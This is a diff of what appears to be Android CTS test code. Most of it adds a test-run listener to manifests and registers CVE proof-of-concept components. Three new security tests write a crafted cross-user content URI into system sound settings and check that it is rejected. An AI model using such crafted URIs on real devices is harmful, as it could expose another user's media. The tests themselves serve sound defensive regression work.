--- a/tests/tests/permission3/AndroidManifest.xml
+++ b/tests/tests/permission3/AndroidManifest.xml
@@ -83,5 +83,8 @@
         android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.permission3.cts"
         android:label="CTS UI tests for permissions">
+        <meta-data
+            android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/permissionpolicy/AndroidManifest.xml b/tests/tests/permissionpolicy/AndroidManifest.xml
index 53ddc59..8895c32 100755
--- a/tests/tests/permissionpolicy/AndroidManifest.xml
+++ b/tests/tests/permissionpolicy/AndroidManifest.xml
@@ -68,6 +68,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.permissionpolicy.cts"
                      android:label="More CTS tests for permissions">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/permissionpolicy/res/raw/android_manifest.xml b/tests/tests/permissionpolicy/res/raw/android_manifest.xml
index 93d2c73..c824ae1 100644
--- a/tests/tests/permissionpolicy/res/raw/android_manifest.xml
+++ b/tests/tests/permissionpolicy/res/raw/android_manifest.xml
@@ -2020,6 +2020,16 @@
     <permission android:name="android.permission.MANAGE_TEST_NETWORKS"
         android:protectionLevel="signature" />
 
+    <!-- Allows direct access to {@link android.remoteauth.RemoteAuthManager}.
+         @hide @TestApi @SystemApi(client=android.annotation.SystemApi.Client.MODULE_LIBRARIES) -->
+    <permission android:name="android.permission.MANAGE_REMOTE_AUTH"
+                android:protectionLevel="signature" />
+
+    <!-- Allows direct access to {@link android.remoteauth.RemoteAuthManager}.
+         @hide @TestApi @SystemApi(client=android.annotation.SystemApi.Client.MODULE_LIBRARIES) -->
+    <permission android:name="android.permission.USE_REMOTE_AUTH"
+                android:protectionLevel="signature" />
+
     <!-- @SystemApi @hide Allows applications to read Wi-Fi credential.
          <p>Not for use by third-party applications. -->
     <permission android:name="android.permission.READ_WIFI_CREDENTIAL"
@@ -5510,6 +5520,11 @@
     <permission android:name="android.permission.DELIVER_COMPANION_MESSAGES"
                 android:protectionLevel="normal" />
 
+    <!-- @SystemApi Allows an application to send and receive messages via CDM transports.
+         @hide -->
+    <permission android:name="android.permission.USE_COMPANION_TRANSPORTS"
+        android:protectionLevel="signature|module" />
+
     <!-- Allows an application to create new companion device associations.
          @SystemApi
          @hide -->
diff --git a/tests/tests/persistentdataservice/AndroidManifest.xml b/tests/tests/persistentdataservice/AndroidManifest.xml
index 30a5344..e5db957 100644
--- a/tests/tests/persistentdataservice/AndroidManifest.xml
+++ b/tests/tests/persistentdataservice/AndroidManifest.xml
@@ -25,6 +25,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.persistentdata.cts"
                      android:label="CTS tests of PersistentDataBlockManager">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
     <uses-sdk android:minSdkVersion="15" android:targetSdkVersion="17"></uses-sdk>
diff --git a/tests/tests/preference/AndroidManifest.xml b/tests/tests/preference/AndroidManifest.xml
index b04d906..b861458 100644
--- a/tests/tests/preference/AndroidManifest.xml
+++ b/tests/tests/preference/AndroidManifest.xml
@@ -59,6 +59,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.preference.cts"
                      android:label="CTS tests of android.preference">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/proto/AndroidManifest.xml b/tests/tests/proto/AndroidManifest.xml
index ed2e426..20897cc 100644
--- a/tests/tests/proto/AndroidManifest.xml
+++ b/tests/tests/proto/AndroidManifest.xml
@@ -28,6 +28,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.util.proto.cts"
                      android:label="CTS tests of android.util.proto">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/provider/AndroidManifest.xml b/tests/tests/provider/AndroidManifest.xml
index 9c07941..93ba41d 100644
--- a/tests/tests/provider/AndroidManifest.xml
+++ b/tests/tests/provider/AndroidManifest.xml
@@ -137,5 +137,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.provider.cts"
          android:label="CTS tests of android.provider">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java b/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java
index aed73d9..482cb89 100644
--- a/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java
+++ b/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java
@@ -16,6 +16,8 @@
 
 package android.provider.cts.settings;
 
+import static com.google.common.truth.Truth.assertThat;
+
 import static org.junit.Assert.assertEquals;
 import static org.junit.Assert.assertFalse;
 import static org.junit.Assert.assertNotNull;
@@ -185,6 +187,50 @@
     }
 
     @Test
+    @AsbSecurityTest(cveBugId = 227201030)
+    public void testInvalidRingtoneUriIsRejected() {
+        final ContentResolver cr = InstrumentationRegistry.getTargetContext().getContentResolver();
+        final String originalValue = System.getString(cr, System.RINGTONE);
+        final String invalidUri = "content://10@media/external/audio/media/1000000019";
+        try {
+            System.putString(cr, System.RINGTONE, invalidUri);
+        } catch (Exception ignored) {
+            // Some implementation of SettingsProvider might throw an exception here, which
+            // is okay, as long as the insertion of the invalid setting fails in the end
+        }
+        // Assert that the insertion didn't take effect
+        assertThat(System.getString(cr, System.RINGTONE)).isEqualTo(originalValue);
+    }
+
+    @Test
+    @AsbSecurityTest(cveBugId = 227201030)
+    public void testInvalidAlarmAlertUriIsRejected() {
+        final ContentResolver cr = InstrumentationRegistry.getTargetContext().getContentResolver();
+        final String originalValue = System.getString(cr, System.NOTIFICATION_SOUND);
+        final String invalidUri = "content://10@media/external/audio/media/1000000019";
+        try {
+            System.putString(cr, System.NOTIFICATION_SOUND, invalidUri);
+        } catch (Exception ignored) {
+        }
+        // Assert that the insertion didn't take effect
+        assertThat(System.getString(cr, System.NOTIFICATION_SOUND)).isEqualTo(originalValue);
+    }
+
+    @Test
+    @AsbSecurityTest(cveBugId = 227201030)
+    public void testInvalidNotificationSoundUriIsRejected() {
+        final ContentResolver cr = InstrumentationRegistry.getTargetContext().getContentResolver();
+        final String originalValue = System.getString(cr, System.ALARM_ALERT);
+        final String invalidUri = "content://10@media/external/audio/media/1000000019";
+        try {
+            System.putString(cr, System.ALARM_ALERT, invalidUri);
+        } catch (Exception ignored) {
+        }
+        // Assert that the insertion didn't take effect
+        assertThat(System.getString(cr, System.ALARM_ALERT)).isEqualTo(originalValue);
+    }
+
+    @Test
     public void testGetDefaultValues() {
         final ContentResolver cr = InstrumentationRegistry.getTargetContext().getContentResolver();
 
diff --git a/tests/tests/renderscript/AndroidManifest.xml b/tests/tests/renderscript/AndroidManifest.xml
index 9b4990e..5b04206 100644
--- a/tests/tests/renderscript/AndroidManifest.xml
+++ b/tests/tests/renderscript/AndroidManifest.xml
@@ -32,6 +32,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.renderscript.cts"
                      android:label="CTS tests of Renderscript component">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/renderscriptlegacy/AndroidManifest.xml b/tests/tests/renderscriptlegacy/AndroidManifest.xml
index 5ce5896..cede25e 100644
--- a/tests/tests/renderscriptlegacy/AndroidManifest.xml
+++ b/tests/tests/renderscriptlegacy/AndroidManifest.xml
@@ -30,6 +30,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.renderscriptlegacy.cts"
                      android:label="CTS tests of Renderscript component">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/resolverservice/AndroidManifest.xml b/tests/tests/resolverservice/AndroidManifest.xml
index ab979ab..d52f3db 100644
--- a/tests/tests/resolverservice/AndroidManifest.xml
+++ b/tests/tests/resolverservice/AndroidManifest.xml
@@ -28,5 +28,7 @@
         android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.service.resolver.cts"
         android:label="CTS tests of android.service.resolver">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/resourcesloader/AndroidManifest.xml b/tests/tests/resourcesloader/AndroidManifest.xml
index 98db265..ecad33e 100644
--- a/tests/tests/resourcesloader/AndroidManifest.xml
+++ b/tests/tests/resourcesloader/AndroidManifest.xml
@@ -33,5 +33,7 @@
         android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.content.res.loader.cts"
         android:label="CTS tests of android.content.res.loader.cts">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/role/AndroidManifest.xml b/tests/tests/role/AndroidManifest.xml
index a69caf1..5389863 100644
--- a/tests/tests/role/AndroidManifest.xml
+++ b/tests/tests/role/AndroidManifest.xml
@@ -34,5 +34,7 @@
         android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.app.role.cts"
         android:label="CTS tests of android.app.role">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/rsblas/AndroidManifest.xml b/tests/tests/rsblas/AndroidManifest.xml
index 2b8dc40..cf27505 100644
--- a/tests/tests/rsblas/AndroidManifest.xml
+++ b/tests/tests/rsblas/AndroidManifest.xml
@@ -28,6 +28,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="com.android.cts.rsblas"
                      android:label="CTS tests of RenderScript IntrinsicBLAS">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/rscpp/AndroidManifest.xml b/tests/tests/rscpp/AndroidManifest.xml
index 34bf54c..da6084b 100644
--- a/tests/tests/rscpp/AndroidManifest.xml
+++ b/tests/tests/rscpp/AndroidManifest.xml
@@ -26,6 +26,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.rscpp.cts"
                      android:label="CTS tests of RenderScript C++ component">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/sax/AndroidManifest.xml b/tests/tests/sax/AndroidManifest.xml
index 98b49b0..0a7a92b 100644
--- a/tests/tests/sax/AndroidManifest.xml
+++ b/tests/tests/sax/AndroidManifest.xml
@@ -25,6 +25,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.sax.cts"
                      android:label="CTS tests of android.sax">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/secure_element/access_control/AccessControlApp1/AndroidManifest.xml b/tests/tests/secure_element/access_control/AccessControlApp1/AndroidManifest.xml
index 0dee704..8ef3068 100644
--- a/tests/tests/secure_element/access_control/AccessControlApp1/AndroidManifest.xml
+++ b/tests/tests/secure_element/access_control/AccessControlApp1/AndroidManifest.xml
@@ -26,6 +26,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:label="CTS tests for Open Mobile API"
                      android:targetPackage="android.omapi.accesscontrol1.cts">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/secure_element/access_control/AccessControlApp2/AndroidManifest.xml b/tests/tests/secure_element/access_control/AccessControlApp2/AndroidManifest.xml
index b2abfd1..65b23a6 100644
--- a/tests/tests/secure_element/access_control/AccessControlApp2/AndroidManifest.xml
+++ b/tests/tests/secure_element/access_control/AccessControlApp2/AndroidManifest.xml
@@ -26,6 +26,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:label="CTS tests for Open Mobile API"
                      android:targetPackage="android.omapi.accesscontrol2.cts">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/secure_element/access_control/AccessControlApp3/AndroidManifest.xml b/tests/tests/secure_element/access_control/AccessControlApp3/AndroidManifest.xml
index a35597f..fdaafdf 100644
--- a/tests/tests/secure_element/access_control/AccessControlApp3/AndroidManifest.xml
+++ b/tests/tests/secure_element/access_control/AccessControlApp3/AndroidManifest.xml
@@ -26,6 +26,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:label="CTS tests for Open Mobile API"
                      android:targetPackage="android.omapi.accesscontrol3.cts">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/secure_element/omapi/AndroidManifest.xml b/tests/tests/secure_element/omapi/AndroidManifest.xml
index 341984fc..3743155 100644
--- a/tests/tests/secure_element/omapi/AndroidManifest.xml
+++ b/tests/tests/secure_element/omapi/AndroidManifest.xml
@@ -26,6 +26,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:label="CTS tests for Open Mobile API"
                      android:targetPackage="android.omapi.cts">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml
index 0ccc832..f8d882b 100644
--- a/tests/tests/security/AndroidManifest.xml
+++ b/tests/tests/security/AndroidManifest.xml
@@ -38,6 +38,9 @@
     <!-- For FileIntegrityManager -->
     <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
 
+     <!-- CVE-2023-21143 -->
+    <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
     <application android:usesCleartextTraffic="true">
         <uses-library android:name="android.test.runner"/>
         <uses-library android:name="org.apache.http.legacy"
@@ -200,7 +203,14 @@
             android:grantUriPermissions="true"
             android:process=":badprovider" />
 
-        <activity android:name="android.security.cts.CVE_2022_20143.PocActivity"
+        <activity android:name="android.security.cts.AutomaticZenRuleTests.PocActivity"
+                  android:exported="true">
+            <intent-filter>
+                <action android:name="android.app.action.AUTOMATIC_ZEN_RULE"/>
+            </intent-filter>
+        </activity>
+
+        <activity android:name="android.security.cts.AutomaticZenRuleTests.SecondPocActivity"
                   android:exported="true">
             <intent-filter>
                 <action android:name="android.app.action.AUTOMATIC_ZEN_RULE"/>
@@ -219,6 +229,7 @@
 
         <activity android:name="android.security.cts.ActivityManagerTest$ActivityOptionsActivity" />
         <activity android:name="android.security.cts.ActivityManagerTest$BaseActivity" />
+        <activity android:name="android.security.cts.ActivityManagerTest$WaitEnterAnimActivity" />
 
         <activity android:name="android.security.cts.PackageInstallerTest$BackgroundLaunchActivity"
             android:exported="true" />
@@ -240,6 +251,15 @@
                 android:resource="@xml/syncadapter" />
         </service>
 
+        <service
+            android:name="android.security.cts.CVE_2022_20129.PocService"
+            android:exported="true"
+            android:permission="android.permission.BIND_TELECOM_CONNECTION_SERVICE">
+            <intent-filter>
+                <action android:name="android.telecom.ConnectionService"/>
+            </intent-filter>
+        </service>
+
         <activity android:name="android.security.cts.CVE_2023_20953.PocActivity"
             android:exported="true" />
 
@@ -263,6 +283,27 @@
             </intent-filter>
         </activity>
 
+        <activity android:name="android.security.cts.CVE_2023_20916.PocActivity"
+            android:exported="true">
+            <intent-filter>
+                <action android:name="android.intent.action.MAIN" />
+                <category android:name="android.intent.category.LAUNCHER" />
+            </intent-filter>
+        </activity>
+
+        <activity android:name="android.security.cts.CVE_2021_0600.PocActivity" />
+
+        <receiver android:name="android.security.cts.CVE_2021_0600.PocDeviceAdminReceiver"
+            android:permission="android.permission.BIND_DEVICE_ADMIN"
+            android:exported="true">
+            <meta-data
+                android:name="android.app.device_admin"
+                android:resource="@xml/device_admin_cve_2021_0600" />
+            <intent-filter>
+                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
+            </intent-filter>
+        </receiver>
+
         <service android:name="android.security.cts.AttributionSourceService"
             android:enabled="true"
             android:exported="true"
@@ -270,11 +311,15 @@
             android:process=":attributionSourceServiceProcess">
         </service>
 
+        <activity android:name="android.security.cts.CVE_2022_20429.PocActivity" />
+
     </application>
 
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.security.cts"
          android:label="CTS tests of android.security.cts">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.security.cts"
diff --git a/tests/tests/security/res/layout/cve_2023_21143.xml b/tests/tests/security/res/layout/cve_2023_21143.xml
new file mode 100644
index 0000000..d8c6845
--- /dev/null
+++ b/tests/tests/security/res/layout/cve_2023_21143.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
+    android:layout_width="match_parent"
+    android:layout_height="match_parent">
+
+    <ImageView
+        android:layout_width="match_parent"
+        android:layout_height="match_parent"
+        android:src="@raw/cve_2023_21143" />
+
+</LinearLayout>
diff --git a/tests/tests/security/res/raw/cve_2023_21143.png b/tests/tests/security/res/raw/cve_2023_21143.png
new file mode 100644
index 0000000..ce0fc57
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2023_21143.png
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_android_telephony_cts_testkey.bin b/tests/tests/security/res/raw/sig_android_telephony_cts_testkey.bin
new file mode 100644
index 0000000..7e2dc3e
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_android_telephony_cts_testkey.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_build_bazel_examples_apex_minimal.bin b/tests/tests/security/res/raw/sig_build_bazel_examples_apex_minimal.bin
new file mode 100644
index 0000000..5add3a7
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_build_bazel_examples_apex_minimal.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cert.bin b/tests/tests/security/res/raw/sig_cert.bin
new file mode 100644
index 0000000..f42b8ae
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cert.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_adbd.bin b/tests/tests/security/res/raw/sig_com_android_adbd.bin
new file mode 100644
index 0000000..aceb985
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_adbd.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_adservices.bin b/tests/tests/security/res/raw/sig_com_android_adservices.bin
new file mode 100644
index 0000000..b5b920b
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_adservices.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_adservices_api.bin b/tests/tests/security/res/raw/sig_com_android_adservices_api.bin
new file mode 100644
index 0000000..d5c4a29
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_adservices_api.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_appsearch.bin b/tests/tests/security/res/raw/sig_com_android_appsearch.bin
new file mode 100644
index 0000000..f133a7b
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_appsearch.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_art.bin b/tests/tests/security/res/raw/sig_com_android_art.bin
new file mode 100644
index 0000000..508c56c
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_art.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_bluetooth.bin b/tests/tests/security/res/raw/sig_com_android_bluetooth.bin
new file mode 100644
index 0000000..3d397c0
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_bluetooth.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_btservices.bin b/tests/tests/security/res/raw/sig_com_android_btservices.bin
new file mode 100644
index 0000000..9ee766c
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_btservices.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_car_framework.bin b/tests/tests/security/res/raw/sig_com_android_car_framework.bin
new file mode 100644
index 0000000..f3b7e78
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_car_framework.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_cellbroadcast.bin b/tests/tests/security/res/raw/sig_com_android_cellbroadcast.bin
new file mode 100644
index 0000000..bad7b6c
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_cellbroadcast.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_compos.bin b/tests/tests/security/res/raw/sig_com_android_compos.bin
new file mode 100644
index 0000000..d4ba69a
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_compos.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_connectivity_resources.bin b/tests/tests/security/res/raw/sig_com_android_connectivity_resources.bin
new file mode 100644
index 0000000..e89a552
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_connectivity_resources.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_extservices.bin b/tests/tests/security/res/raw/sig_com_android_extservices.bin
new file mode 100644
index 0000000..790edbb
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_extservices.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_geotz.bin b/tests/tests/security/res/raw/sig_com_android_geotz.bin
new file mode 100644
index 0000000..aa9479a
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_geotz.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_core_permissions.bin b/tests/tests/security/res/raw/sig_com_android_hardware_core_permissions.bin
new file mode 100644
index 0000000..1ac04ee
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_core_permissions.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_power.bin b/tests/tests/security/res/raw/sig_com_android_hardware_power.bin
new file mode 100644
index 0000000..7db8788
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_power.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_sensors.bin b/tests/tests/security/res/raw/sig_com_android_hardware_sensors.bin
new file mode 100644
index 0000000..c3f2e2e
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_sensors.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_thermal.bin b/tests/tests/security/res/raw/sig_com_android_hardware_thermal.bin
new file mode 100644
index 0000000..03b7c44
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_thermal.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_usb.bin b/tests/tests/security/res/raw/sig_com_android_hardware_usb.bin
new file mode 100644
index 0000000..7a892d8
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_usb.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_vibrator.bin b/tests/tests/security/res/raw/sig_com_android_hardware_vibrator.bin
new file mode 100644
index 0000000..d331763
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_vibrator.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_wifi.bin b/tests/tests/security/res/raw/sig_com_android_hardware_wifi.bin
new file mode 100644
index 0000000..9b0f190
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_wifi.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hotspot2_osulogin.bin b/tests/tests/security/res/raw/sig_com_android_hotspot2_osulogin.bin
new file mode 100644
index 0000000..2bb4b5a
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hotspot2_osulogin.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_i18n.bin b/tests/tests/security/res/raw/sig_com_android_i18n.bin
new file mode 100644
index 0000000..6bcf8ec
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_i18n.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_ipsec.bin b/tests/tests/security/res/raw/sig_com_android_ipsec.bin
new file mode 100644
index 0000000..319484a
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_ipsec.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_mediaprovider.bin b/tests/tests/security/res/raw/sig_com_android_mediaprovider.bin
new file mode 100644
index 0000000..c87618f
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_mediaprovider.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_neuralnetworks.bin b/tests/tests/security/res/raw/sig_com_android_neuralnetworks.bin
new file mode 100644
index 0000000..05cb7b9
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_neuralnetworks.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_os_statsd.bin b/tests/tests/security/res/raw/sig_com_android_os_statsd.bin
new file mode 100644
index 0000000..ed8693b
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_os_statsd.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_permission.bin b/tests/tests/security/res/raw/sig_com_android_permission.bin
new file mode 100644
index 0000000..e9e5a69
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_permission.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_rkpd.bin b/tests/tests/security/res/raw/sig_com_android_rkpd.bin
new file mode 100644
index 0000000..c49bfd0
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_rkpd.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_runtime.bin b/tests/tests/security/res/raw/sig_com_android_runtime.bin
new file mode 100644
index 0000000..e59f0f3
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_runtime.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_safetycenter_resources.bin b/tests/tests/security/res/raw/sig_com_android_safetycenter_resources.bin
new file mode 100644
index 0000000..d9f97a4
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_safetycenter_resources.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_sdkext.bin b/tests/tests/security/res/raw/sig_com_android_sdkext.bin
new file mode 100644
index 0000000..26a9b92
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_sdkext.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_uwb.bin b/tests/tests/security/res/raw/sig_com_android_uwb.bin
new file mode 100644
index 0000000..1118522
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_uwb.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_uwb_resources.bin b/tests/tests/security/res/raw/sig_com_android_uwb_resources.bin
new file mode 100644
index 0000000..55f326c
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_uwb_resources.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_vibrator_drv2624.bin b/tests/tests/security/res/raw/sig_com_android_vibrator_drv2624.bin
new file mode 100644
index 0000000..cd7e33c
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_vibrator_drv2624.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_vibrator_sunfish.bin b/tests/tests/security/res/raw/sig_com_android_vibrator_sunfish.bin
new file mode 100644
index 0000000..42e01d6
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_vibrator_sunfish.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_virt.bin b/tests/tests/security/res/raw/sig_com_android_virt.bin
new file mode 100644
index 0000000..89c91e3
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_virt.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_vndk.bin b/tests/tests/security/res/raw/sig_com_android_vndk.bin
new file mode 100644
index 0000000..e6b006b
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_vndk.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_wifi.bin b/tests/tests/security/res/raw/sig_com_android_wifi.bin
new file mode 100644
index 0000000..469ee37
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_wifi.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_wifi_dialog.bin b/tests/tests/security/res/raw/sig_com_android_wifi_dialog.bin
new file mode 100644
index 0000000..1fc37eb
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_wifi_dialog.bin
Binary files differ
